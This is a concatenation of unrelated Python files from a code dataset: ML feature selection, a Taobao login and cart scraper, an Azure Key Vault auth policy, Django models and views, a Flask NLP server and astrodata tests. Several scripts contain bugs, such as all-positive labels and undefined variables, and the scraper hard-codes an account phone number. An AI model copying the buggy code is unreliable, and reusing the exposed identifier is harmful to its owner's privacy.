list(list_of_pairs.keys())\n shuffle(candidates)\n key = candidates[0]\n #print(key)\n candidate = list_of_pairs[key]\n #remove from dictionary\n del list_of_pairs[key]\n #make sure the author is not in the dict\n if candidate not in l:\n l[key] = candidate\n\n else:\n next_one = destinations[m+1]\n #next list same id if author in dict\n if candidate not in next_one:\n next_one[key] = candidate\n else:\n next_one = destinations[m+2]\n if candidate not in next_one:\n next_one[key] = candidate\n destinations_trimmed =[]\n for i,j in enumerate(destinations):\n aTuple = list(j.items())\n shuffle(aTuple)\n destinations_trimmed.append(dict(aTuple[:83]))\n return destinations_trimmed\n\nfrom random import shuffle\nfrom application.selective_features import dictionaries_of_features, make_genres_big\nfrom application.pickles import pickledData\nimport pandas as pd\nfrom scipy.stats.stats import spearmanr\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.feature_extraction import DictVectorizer\n\npData = pickledData()\n\n# define as a function, supply a big_genre\ndef partition_features_test_train(big_genre, pData):\n # Local variables.\n _ids = pData._ids\n dates = pData.dates\n genres = pData.genres\n #needs conversion\n big_genres = make_genres_big(genres)\n authors = pData.authors\n feature_dicts = pData.feature_dicts\n\n # get all ids for big_genre\n big_genre_ids_and_author = {}\n other_ids_and_author = {}\n for i, j in enumerate(big_genres):\n #print(i, _ids[i], j)\n if j == big_genre:\n big_genre_ids_and_author[_ids[i]] = authors[i]\n else:\n other_ids_and_author[_ids[i]] = authors[i]\n\n # shuffle big_genre_tuples and \"deal out\" randomly like deck of cards into three, starting with author repeats\n in_genre = divide_by_three(big_genre_ids_and_author)\n # do same for other_ids\n non_genre = divide_by_three(other_ids_and_author)\n combined_partitions_ids = []\n combined_partitions_binary_genres = []\n for f,g in enumerate(in_genre):\n combined = list(g.keys())+list(non_genre[f].keys())\n shuffle(combined)\n genre_processor = []\n for i in combined:\n if i in list(g.keys()):\n genre_processor.append(1)\n else:\n genre_processor.append(1)\n combined_partitions_binary_genres.append(genre_processor)\n combined_partitions_ids.append(combined)\n return combined_partitions_ids, combined_partitions_binary_genres\n\ncombined_partitions_ids, combined_partitions_binary_genres = partition_features_test_train(\"crime\", pData)\n\n#convert lists of ids into dictionaries of features in order of ids\n\n#the goal here is to end up with one list for feature_selection, one for testing, and one for training\nfeature_select_dicts = [pData.feature_dicts[d-1] for d in combined_partitions_ids[0]]\ntest_dicts = pData.feature_dicts = [pData.feature_dicts[d-1] for d in combined_partitions_ids[1]]\ntrain_dicts = pData.feature_dicts = [pData.feature_dicts[d-1] for d in combined_partitions_ids[2]]\n\nbinary_genres = combined_partitions_binary_genres[0]\n## Begin function block\n\n#convert to tf-idf model\ntfidf = TfidfTransformer()\nvec = DictVectorizer()\nvect = vec.fit_transform(feature_select_dicts)\nadjusted = tfidf.fit_transform(vect)\n\nterm_indices = list(vec.vocabulary_.items())\n#alphabetical order\nterm_indices.sort(key=operator.itemgetter(1))\n\nterm_list = [i[0] for i in term_indices]\ndata = adjusted.toarray()\n\np_tuples = []\n\nfor column in data.T:\n p, c = spearmanr(column, binary_genres)\n f_tuple = (p,c)\n p_tuples.append(f_tuple)\n\n# zip back together with term_list\n#print(len(term_list), len(p_tuples))\nfinal_tuples = list(zip(term_list, [i[0] for i in p_tuples], [i[1] for i in p_tuples]))\n\nprint(final_tuples)\n## end function block\n##\n##\n\n# build feature list using sorted p_tuples\nselected_feature_list = []\n\n# process test and train dicts to include only chosen features\n# result = dictionaries_of_features(feature_dicts, genre_features)\n\ntext_clf = Pipeline([('vect', DictVectorizer()), ('tfidf', TfidfTransformer()),('clf', LogisticRegression()),])\n","sub_path":"logistic_w_selective_features.py","file_name":"logistic_w_selective_features.py","file_ext":"py","file_size_in_byte":4777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"293921646","text":"\"\"\"登录淘宝\"\"\"\nimport json\nimport re\nimport requests\n\nurl_login = \"https://login.taobao.com/member/login.jhtml?redirectURL=https%3A%2F%2Fwww.taobao.com%2F\"\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0',\n}\n\npost_data = {\n 'TPL_username': '13135767989', # 用户名\n 'TPL_password': '' # 密码\n}\n\n\ndef login():\n session = requests.session()\n response = session.post(url_login, data=post_data,headers=headers)\n print(response.request.headers)\n return response, session\n\n\ndef get_cart(session):\n \"\"\"读取购物车信息\"\"\"\n url_cart = \"https://cart.taobao.com/cart.htm?t=1525683137724\"\n response = session.get(url_cart, headers=headers)\n\n response = response.text\n result = re.search(r'firstData = (.*?);}catch', response)\n if result:\n result = result.groups()[0]\n data = json.loads(result)\n print(data[\"list\"])\n for item in data[\"list\"]:\n print(item['seller'])\n print(item['title'])\n print(\"=====\")\n\n\nif __name__ == '__main__':\n response, session = login()\n get_cart(session)\n","sub_path":"login_test/taobao.py","file_name":"taobao.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"377349039","text":"# ------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------\n\"\"\"Policy implementing Key Vault's challenge authentication protocol.\n\nNormally the protocol is only used for the client's first service request, upon which:\n1. The challenge authentication policy sends a copy of the request, without authorization or content.\n2. Key Vault responds 401 with a header (the 'challenge') detailing how the client should authenticate such a request.\n3. The policy authenticates according to the challenge and sends the original request with authorization.\n\nThe policy caches the challenge and thus knows how to authenticate future requests. However, authentication\nrequirements can change. For example, a vault may move to a new tenant. In such a case the policy will attempt the\nprotocol again.\n\"\"\"\n\nimport time\nfrom typing import TYPE_CHECKING\nfrom urllib.parse import urlparse\n\nfrom azure.core.exceptions import ServiceRequestError\nfrom azure.core.pipeline import PipelineRequest\nfrom azure.core.pipeline.policies import BearerTokenCredentialPolicy\n\nfrom .http_challenge import HttpChallenge\nfrom . import http_challenge_cache as ChallengeCache\n\nif TYPE_CHECKING:\n from typing import Optional\n from azure.core.credentials import AccessToken, TokenCredential\n from azure.core.pipeline import PipelineResponse\n\n\ndef _enforce_tls(request: PipelineRequest) -> None:\n if not request.http_request.url.lower().startswith(\"https\"):\n raise ServiceRequestError(\n \"Bearer token authentication is not permitted for non-TLS protected (non-https) URLs.\"\n )\n\n\ndef _update_challenge(request: PipelineRequest, challenger: \"PipelineResponse\") -> HttpChallenge:\n \"\"\"Parse challenge from a challenge response, cache it, and return it.\n\n :param request: The pipeline request that prompted the challenge response.\n :type request: :class:`~azure.core.pipeline.PipelineRequest`\n :param challenger: The pipeline response containing the authentication challenge.\n :type challenger: :class:`~azure.core.pipeline.PipelineResponse`\n\n :returns: An HttpChallenge object representing the authentication challenge.\n :rtype: HttpChallenge\n \"\"\"\n\n challenge = HttpChallenge(\n request.http_request.url,\n challenger.http_response.headers.get(\"WWW-Authenticate\"),\n response_headers=challenger.http_response.headers,\n )\n ChallengeCache.set_challenge_for_url(request.http_request.url, challenge)\n return challenge\n\n\nclass ChallengeAuthPolicy(BearerTokenCredentialPolicy):\n \"\"\"Policy for handling HTTP authentication challenges.\n\n :param credential: An object which can provide an access token for the vault, such as a credential from\n :mod:`azure.identity`\n :type credential: :class:`~azure.core.credentials.TokenCredential`\n \"\"\"\n\n def __init__(self, credential: \"TokenCredential\", *scopes: str, **kwargs) -> None:\n super(ChallengeAuthPolicy, self).__init__(credential, *scopes, **kwargs)\n self._credential = credential\n self._token: \"Optional[AccessToken]\" = None\n self._verify_challenge_resource = kwargs.pop(\"verify_challenge_resource\", True)\n\n def on_request(self, request: PipelineRequest) -> None:\n _enforce_tls(request)\n challenge = ChallengeCache.get_challenge_for_url(request.http_request.url)\n if challenge:\n # Note that if the vault has moved to a new tenant since our last request for it, this request will fail.\n if self._need_new_token:\n # azure-identity credentials require an AADv2 scope but the challenge may specify an AADv1 resource\n scope = challenge.get_scope() or challenge.get_resource() + \"/.default\"\n self._token = self._credential.get_token(scope, tenant_id=challenge.tenant_id)\n\n # ignore mypy's warning -- although self._token is Optional, get_token raises when it fails to get a token\n request.http_request.headers[\"Authorization\"] = f\"Bearer {self._token.token}\" # type: ignore\n return\n\n # else: discover authentication information by eliciting a challenge from Key Vault. Remove any request data,\n # saving it for later. Key Vault will reject the request as unauthorized and respond with a challenge.\n # on_challenge will parse that challenge, reattach any body removed here, authorize the request, and tell\n # super to send it again.\n if request.http_request.body:\n request.context[\"key_vault_request_data\"] = request.http_request.body\n request.http_request.set_json_body(None)\n request.http_request.headers[\"Content-Length\"] = \"0\"\n\n def on_challenge(self, request: PipelineRequest, response: \"PipelineResponse\") -> bool:\n try:\n challenge = _update_challenge(request, response)\n # azure-identity credentials require an AADv2 scope but the challenge may specify an AADv1 resource\n scope = challenge.get_scope() or challenge.get_resource() + \"/.default\"\n except ValueError:\n return False\n\n if self._verify_challenge_resource:\n resource_domain = urlparse(scope).netloc\n if not resource_domain:\n raise ValueError(f\"The challenge contains invalid scope '{scope}'.\")\n\n request_domain = urlparse(request.http_request.url).netloc\n if not request_domain.lower().endswith(f\".{resource_domain.lower()}\"):\n raise ValueError(\n f\"The challenge resource '{resource_domain}' does not match the requested domain. Pass \"\n \"`verify_challenge_resource=False` to your client's constructor to disable this verification. \"\n \"See https://aka.ms/azsdk/blog/vault-uri for more information.\"\n )\n\n body = request.context.pop(\"key_vault_request_data\", None)\n request.http_request.set_text_body(body) # no-op when text is None\n\n # The tenant parsed from AD FS challenges is \"adfs\"; we don't actually need a tenant for AD FS authentication\n # For AD FS we skip cross-tenant authentication per https://github.com/Azure/azure-sdk-for-python/issues/28648\n if challenge.tenant_id and challenge.tenant_id.lower().endswith(\"adfs\"):\n self.authorize_request(request, scope)\n else:\n self.authorize_request(request, scope, tenant_id=challenge.tenant_id)\n\n return True\n\n @property\n def _need_new_token(self) -> bool:\n return not self._token or self._token.expires_on - time.time() < 300\n","sub_path":"sdk/keyvault/azure-keyvault-certificates/azure/keyvault/certificates/_shared/challenge_auth_policy.py","file_name":"challenge_auth_policy.py","file_ext":"py","file_size_in_byte":6655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"98549844","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('reporting', '0005_auto_20141004_0349'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ReportingCell',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date', models.DateField()),\n ('value', models.IntegerField(default=0)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ReportingLine',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=40, verbose_name='nom')),\n ('unity', models.CharField(max_length=40, verbose_name='unity')),\n ('reporting', models.ForeignKey(to='reporting.Reporting')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='reportingcell',\n name='reporting_line',\n field=models.ForeignKey(to='reporting.ReportingLine'),\n preserve_default=True,\n ),\n migrations.RemoveField(\n model_name='reporting',\n name='data',\n ),\n ]\n","sub_path":"api/reporting/migrations/0006_auto_20141005_0841.py","file_name":"0006_auto_20141005_0841.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"120629974","text":"import torch\nimport torch.nn.functional as F\nfrom tqdm import tqdm\n\nfrom dice_loss import dice_coeff\n\ndef compute_overlaps_masks(masks1, masks2):\n '''\n masks1, masks2: [Height, Width, instances]\n this for binary mask\n '''\n \n # If either set of masks is empty return empty result\n if masks1.shape[0] == 0 or masks2.shape[0] == 0:\n return np.zeros((masks1.shape[0], masks2.shape[-1]))\n # flatten masks and compute their areas\n #masks1 = np.reshape(masks1 > .5, (-1, masks1.shape[-1])).astype(np.float32)\n #masks2 = np.reshape(masks2 > .5, (-1, masks2.shape[-1])).astype(np.float32)\n #area1 = np.sum(masks1, axis=0)\n #area2 = np.sum(masks2, axis=0)\n\n # intersections and union\n intersections = torch.sum(torch.mul(masks1, masks2)) #correct part\n union = torch.sum((masks1 + masks2)-torch.mul(masks1, masks2))\n \n if intersections ==0 or union==0:\n overlaps = 0\n else:\n overlaps = intersections / union\n\n return overlaps\n\ndef miou_loss(net, loader, device):\n \"\"\"Evaluation without the densecrf with the dice coefficient\"\"\"\n net.eval()\n mask_type = torch.float32 #if net.num_classes == 1 else torch.long\n n_val = len(loader) # the number of batch\n #batch_size = loader.batch_size \n tot = 0\n print('')\n with tqdm(total=n_val, desc='mIOU round', unit='batch', leave=False) as pbar:\n for batch in loader:\n imgs, true_masks = batch['image'], batch['mask']\n imgs = imgs.to(device=device, dtype=torch.float32)\n true_masks = true_masks.to(device=device, dtype=mask_type)\n\n with torch.no_grad():\n # SegNet\n # masks_pred, masks_softmax = net(imgs)\n # DeepLabv3+\n #masks_pred = net(imgs)\n # PSPNet\n masks_pred = net(imgs)\n\n pred = torch.sigmoid(masks_pred)\n pred = (pred > 0.5).float()\n\n for i in range(loader.batch_size):\n tot += compute_overlaps_masks(pred[i], true_masks[i])\n #print(compute_overlaps_masks(pred[i], true_masks[i]))\n pbar.update()\n \n return tot / (n_val*loader.batch_size)\n","sub_path":"miou_psp.py","file_name":"miou_psp.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"108962638","text":"#------------------------------------------------------\n# fvs_direction.py identifies the orientation of FVS node perturbations resulting in attractors in the goal cluster (successful perturbations)\n# \n# INPUTS:\n# 1. Basal states of randomly generated perturbations of FVS nodes\n# 2. A list of perturbations resulting in attractors in the goal cluster\n# 3. A list of FVS nodes\n#\n# OUTPUTS:\n# 1. A file with the frequency of each perturbation orientation (knocked-in, knocked-out, or no change) for the perturbations resulting in attractors in the goal cluster\n#------------------------------------------------------\n\nimport pandas as pd\nimport os\nimport sys\n\n\n###################### User Inputs: #####################\nsub = sys.argv[1] #File with names of perturbations of inteerest\nFCname = sys.argv[2] #Name of perturbed FVS set\n#########################################################\n\ndirname = os.path.dirname('virtual_screening/')\nbasal = pd.read_csv(os.path.join(dirname, 'basal_states.txt'), delim_whitespace = True, index_col = ['name']) #Read in FVS node perturbations \nsubset = pd.read_csv(os.path.join(dirname, sub), delim_whitespace = True, index_col = ['name']) #Read in list of successful perturbations\nfvs = pd.read_csv(os.path.join('inputfiles', FCname), index_col = ['name']) #Read in list of FVS nodes\n\n#Create dataframe with perturbation orientations for successful perturbations\ndf = basal.loc[basal.index.isin(subset.index), :] \ndf.columns = fvs.index\n\n#Create dataframe with frequency of orientation of each FVS node in successful perturbations\nfreq = pd.DataFrame(index = ['knocked-in', 'knocked-out', 'no_change'], columns = fvs.index)\nfor node, col in df.iteritems():\n col = col.tolist()\n up = col.count(1)\n down = col.count(-1)\n nc = col.count(0)\n freq.loc['Knocked-in', node] = round(up/npert*100, 3)\n freq.loc['Knocked-out', node] = round(down/npert*100,3)\n freq.loc['No_Change', node] = round(nc/npert*100,3)\n\nprint(freq)\noutf = sub.split('.txt')[0] + '_fvsDir.txt'\nfreq.to_csv(os.path.join(dirname, outf), sep = \" \")\n\n#### Write out dataframe including number of nodes that must be perturbed (not no-change) in a successful perturbation:\ncount = pd.DataFrame(index = basal.index, columns = ['Number_of_Perturbed_Nodes'])\n \nfor pert, row in df.iterrows():\n row = row.tolist()\n nc = row.count(0)\n npert = len(basal.columns) - nc\n count.loc[pert, 'Number_of_Perturbed_Nodes'] = npert\ncount.to_csv(os.path.join(dirname, 'number_of_perturbed_nodes_' + sub), sep = \" \", index_label = 'name')\nprint(count.Number_of_Perturbed_Nodes.value_counts())\n","sub_path":"_site/_projects/project2/Network_Analysis/scripts/9_fvs_direction.py","file_name":"9_fvs_direction.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"306606038","text":"'''\nCreated on 2015. 4. 3.\n\n@author: bklim\n'''\n\nclass Monster(object):\n '''\n classdocs\n '''\n FirstColor = []\n SecondColor = []\n Attack = 0\n Heal = 0\n TwoWay = []\n RowAwake = []\n ColorAwake = []\n Hp = 0\n\n def __init__(self):\n '''\n Constructor\n '''\n pass\n \n def settings(self, fc, sc, at, he, tw, ra, ca, h):\n self.FirstColor = fc\n self.SecondColor = sc\n self.Attack = at\n self.Heal = he\n self.Twoway = tw\n self.RowAwake = ra\n self.ColorAwake = ca\n self.Hp = h\n \n ","sub_path":"PDSolver/src/Monster.py","file_name":"Monster.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"202874474","text":"from MobileApps.libs.flows.android.smart.flow_container import FLOW_NAMES\nimport pytest\n\npytest.app_info = \"SMART\"\n\nclass Test_Suite_01_About_Hp_Smart(object):\n @pytest.fixture(scope=\"class\", autouse=\"true\")\n def class_setup(cls, request, android_smart_setup):\n cls = cls.__class__\n cls.driver, cls.fc = android_smart_setup\n\n # Define the flows\n cls.home = cls.fc.flow[FLOW_NAMES.HOME]\n cls.help_center = cls.fc.flow[FLOW_NAMES.HELP_CENTER]\n\n @pytest.fixture(scope=\"function\", autouse=\"true\")\n def function_setup(self, account_type):\n self.fc.reset_app()\n self.fc.set_hpid_account(a_type=account_type, claimable=True, ii_status=True if account_type == \"hp+\" else False)\n self.fc.load_smart_dashboard_help_center_about_hp_smart()\n\n @pytest.mark.parametrize(\"account_type\", [\"hp+\", \"ucde\"])\n def test_01_getting_to_know_smart(self, account_type):\n \"\"\"\n Description:\n 1. Load to Home screen with an hp+ account\n 2. Click on Account button\n 3. Click on Menu button\n 4. Click on Help Center\n 5. Click on About HP Smart item\n 6. Click on Getting to Know HP Smart\n\n Expected Result:\n 5. Verify About HP Smart page\n \"\"\"\n self.help_center.click_link_on_help_center_screen(self.help_center.GETTING_TO_KNOW_HP_SMART)\n self.help_center.verify_getting_to_know_hp_smart()\n\n @pytest.mark.parametrize(\"account_type\", [\"hp+\", \"ucde\"])\n def test_02_starting_off(self, account_type):\n \"\"\"\n Description:\n 1. Load to Home screen with an hp+ account\n 2. Click on Account button\n 3. Click on Menu button\n 4. Click on Help Center\n 5. Click on About HP Smart item\n 6. Click on Starting Off\n\n Expected Result:\n 5. Verify Starting Off page\n \"\"\"\n self.help_center.click_link_on_help_center_screen(self.help_center.STARTING_OFF)\n self.help_center.verify_starting_off()\n\n @pytest.mark.parametrize(\"account_type\", [\"hp+\", \"ucde\"])\n def test_03_sharing_files(self, account_type):\n \"\"\"\n Description:\n 1. Load to Home screen with an hp+ account\n 2. Click on Account button\n 3. Click on Menu button\n 4. Click on Help Center\n 5. Click on About HP Smart item\n 6. Click on Sharing Files\n\n Expected Result:\n 5. Verify Sharing Files page\n \"\"\"\n self.help_center.click_link_on_help_center_screen(self.help_center.SHARING_FILES)\n self.help_center.verify_sharing_file()","sub_path":"tests/android/smart/functionality/smart_dashboard_help_center/test_suite_01_about_hp_smart.py","file_name":"test_suite_01_about_hp_smart.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"610165216","text":"from django.views import generic\nfrom django.db.models import Q\nfrom .models import Post\nfrom .forms import PostSerachForm\n\nclass BasePostListView(generic.ListView):\n \"\"\"記事一覧表示の共通処理\"\"\"\n model = Post\n context_object_name = 'posts' # 省略すると_list(post_list)という名前でテンプレートに渡される\n paginate_by = 10\n\n def get_queryset(self):\n \"\"\"全ての記事を取得\"\"\"\n queryset = Post.objects.filter(public_flag='True').order_by('-created_date')\n return queryset\n\n\nclass IndexPostListView(BasePostListView):\n \"\"\"記事一覧表示\"\"\"\n\n def get_queryset(self):\n \"\"\"記事検索の絞り込み\"\"\"\n form = PostSerachForm(self.request.GET)\n form.is_valid()\n keyword = form.cleaned_data['keyword']\n queryset = super().get_queryset()\n if keyword:\n for word in keyword.split():\n queryset = queryset.filter(\n Q(title__icontains=word) | Q(body__icontains=word))\n return queryset\n\n def get_context_data(self, **kwargs):\n \"\"\"ヘッダ、パンくずリストの制御用\"\"\"\n form = PostSerachForm(self.request.GET)\n form.is_valid()\n keyword = form.cleaned_data['keyword']\n context = super().get_context_data(**kwargs)\n if keyword:\n context[\"output_type\"] = \"search\"\n context[\"search_keyword\"] = keyword\n return context\n\n\nclass CategoryPostListView(BasePostListView):\n \"\"\"記事一覧(カテゴリ)の表示\"\"\"\n\n def get_queryset(self):\n \"\"\"カテゴリで記事を絞り込む\"\"\"\n queryset = super().get_queryset()\n category_filter = self.kwargs[\"category\"]\n if self.kwargs[\"category\"]:\n queryset = queryset.filter(\n Q(main_category__name=category_filter) |\n Q(sub_categories__name=category_filter)).distinct()\n return queryset\n\n def get_context_data(self, **kwargs):\n \"\"\"ヘッダ、パンくずリストの制御用\"\"\"\n context = super().get_context_data(**kwargs)\n context['output_type'] = \"category\"\n context['target_category'] = self.kwargs[\"category\"]\n return context\n\n\nclass PostDetailView(generic.DetailView):\n \"\"\"記事の詳細を表示\"\"\"\n model = Post\n slug_field = 'permalink'\n slug_url_kwarg = 'permalink'\n\n def get_context_data(self, **kwargs):\n \"\"\"前後の記事を取得\"\"\"\n context = super().get_context_data(**kwargs)\n try:\n post = Post.objects.get(permalink=self.kwargs[\"permalink\"])\n prev_post = post.get_previous_by_created_date()\n except Post.DoesNotExist:\n prev_post = None\n context['prev_post'] = prev_post\n try:\n post = Post.objects.get(permalink=self.kwargs[\"permalink\"])\n next_post = post.get_next_by_created_date()\n except Post.DoesNotExist:\n next_post = None\n context['next_post'] = next_post\n\n return context\n","sub_path":"myblog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"158293732","text":"from flask import Flask\nfrom flask import request\n\n# create flask app\napp = Flask(__name__)\n\n# import spacy for nlp\nimport spacy_nlp\n\n# import wordnet for synsets\nfrom nltk.corpus import wordnet as wn\n\n# import mordecai for geoparsing\nfrom mordecai import Geoparser\ngeo = Geoparser()\n\nimport json\n\n\n@app.route('/')\ndef hello():\n return \"Hello World!\\n This python server is used for processing query logs. Routes include '/test_route/', '/spacy/', '/nltk/' '/mordecai/'\"\n\n\n@app.route('/test_route/')\ndef thing():\n return \"\"\"this is a test route! To parse a query, use 'http://127.0.0.1:5000/spacy/?query_string=...' \\n\n There are other providers like nltk. This is accessable at http://127.0.0.1:5000/nltk/?query_string=...\"\"\"\n\n\n@app.route(\"/spacy/\")\ndef parse_text():\n try:\n # pull off query string arg from url\n query_string = request.args.get('query_string')\n\n # nlp parse string using spaCy\n string_details = spacy_nlp.parse(query_string)\n\n # convert to JSON\n as_json = json.dumps(string_details)\n return as_json\n except:\n print('there was an exception to route /spacy/')\n\n@app.route(\"/nltk/synsets/\")\ndef nltk():\n try:\n # pull off query string arg from url\n query_string = request.args.get('query_string')\n\n res = wn.synsets(query_string)\n res = str(res)\n return res\n\n except:\n print('there was an exception running /wn/')\n\n\n@app.route(\"/mordecai/\")\ndef mordecai_geoparser():\n try:\n # pull off query string arg from url\n query_string = request.args.get('query_string')\n\n # geoparse query string\n geoparsed = geo.geoparse(query_string)\n\n geoparsed = str(geoparsed)\n\n return geoparsed\n except:\n print('there was an exception running /mordecai/')\n\n\nif __name__ == '__main__':\n app.run(threaded=True)","sub_path":"src/text_processing/nlp/python_server.py","file_name":"python_server.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"89950560","text":"import glob\nimport os\n\nimport numpy as np\nimport pytest\nfrom astropy.io import fits\nfrom astropy.table import Table\n\nimport astrodata\nfrom astrodata.testing import download_from_archive\n\ntest_files = [\n \"N20160727S0077.fits\", # NIFS DARK\n \"N20170529S0168.fits\", # GMOS-N SPECT\n \"N20190116G0054i.fits\", # GRACES SPECT\n \"N20190120S0287.fits\", # NIRI IMAGE\n \"N20190206S0279.fits\", # GNIRS SPECT XD\n \"S20150609S0023.fits\", # GSAOI DARK\n \"S20170103S0032.fits\", # F2 IMAGE\n \"S20170505S0031.fits\", # GSAOI FLAT\n \"S20170505S0095.fits\", # GSAOI IMAGE\n \"S20171116S0078.fits\", # GMOS-S MOS NS\n \"S20180223S0229.fits\", # GMOS IFU ACQUISITION\n \"S20190213S0084.fits\", # F2 IMAGE\n]\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_file_exists(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n assert os.path.exists(os.path.join(path_to_inputs, fname)), \\\n \"File does not exists: {:s}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_can_open_fits_file(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(os.path.join(path_to_inputs, fname))\n\n assert isinstance(ad, astrodata.fits.AstroDataFits), \\\n \"Could not open file: {:s}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_basename_is_properly_set(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n basename = os.path.basename(fname)\n\n assert ad.filename == basename, \\\n \".filename property does not match input file name for file \" \\\n \"{:s}\".format(basename)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_can_add_and_del_extension(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n original_size = len(ad)\n\n ourarray = np.array([(1, 2, 3), (11, 12, 13), (21, 22, 23)])\n ad.append(ourarray)\n\n assert len(ad) == (original_size + 1), \\\n \"Could not append extension to ad: {:s}\".format(fname)\n\n del ad[original_size]\n\n assert len(ad) == original_size, \\\n \"Could not remove extension from ad: {:s}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_extension_data_is_an_array(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n assert type(ad[0].data) == np.ndarray, \\\n \"Expected data type {} for {} but found {}\".format(\n np.ndarray, fname, type(ad[0].data))\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_iterate_over_extensions(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n metadata = (('SCI', 1), ('SCI', 2), ('SCI', 3))\n\n for ext, md in zip(ad, metadata):\n assert ext.hdr['EXTNAME'] == md[0], \\\n \"Mismatching EXTNAME for file {:s}\".format(fname)\n assert ext.hdr['EXTVER'] == md[1], \\\n \"Mismatching EXTVER for file {:s}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_slice_multiple(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n metadata = ('SCI', 2), ('SCI', 3)\n\n try:\n slc = ad[1, 2]\n\n except IndexError:\n assert len(ad) == 1\n\n else:\n assert len(slc) == 2\n for ext, md in zip(slc, metadata):\n assert (ext.hdr['EXTNAME'], ext.hdr['EXTVER']) == md, \\\n \"Test failed for file: {:s}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_slice_single(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n try:\n metadata = ('SCI', 2)\n ext = ad[1]\n\n except IndexError:\n assert len(ad) == 1, \\\n \"Mismatching number of extensions for file {:s}\".format(\n fname)\n\n else:\n assert ext.is_single, \\\n \"Mismatching number of extensions for file {:s}\".format(\n fname)\n\n assert ext.hdr['EXTNAME'] == metadata[0], \\\n \"Mismatching EXTNAME for file {:s}\".format(fname)\n\n assert ext.hdr['EXTVER'] == metadata[1], \\\n \"Mismatching EXTVER for file {:s}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_iterate_over_single_slice(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n metadata = ('SCI', 1)\n\n for ext in ad[0]:\n assert (ext.hdr['EXTNAME'], ext.hdr['EXTVER']) == metadata, \\\n \"Assertion failed for file: {}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_slice_negative(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n assert ad.data[-1] is ad[-1].data, \\\n \"Assertion failed for file: {}\".format(fname)\n\n\n@pytest.mark.remote_data\n@pytest.mark.parametrize(\"input_file\", test_files)\ndef test_set_a_keyword_on_phu(input_file, path_to_inputs):\n fname = download_from_archive(input_file, path=path_to_inputs)\n ad = astrodata.open(fname)\n\n ad.phu['DETECTOR'] = 'FooBar'\n ad.phu['ARBTRARY'] = 'BarBaz'\n\n assert ad.phu['DETECTOR'] == 'FooBar', \\\n \"Assertion failed for file: {}\".format(fname)\n\n assert ad.phu['ARBTRARY'] == 'BarBaz', \\\n \"Assertion failed for file: 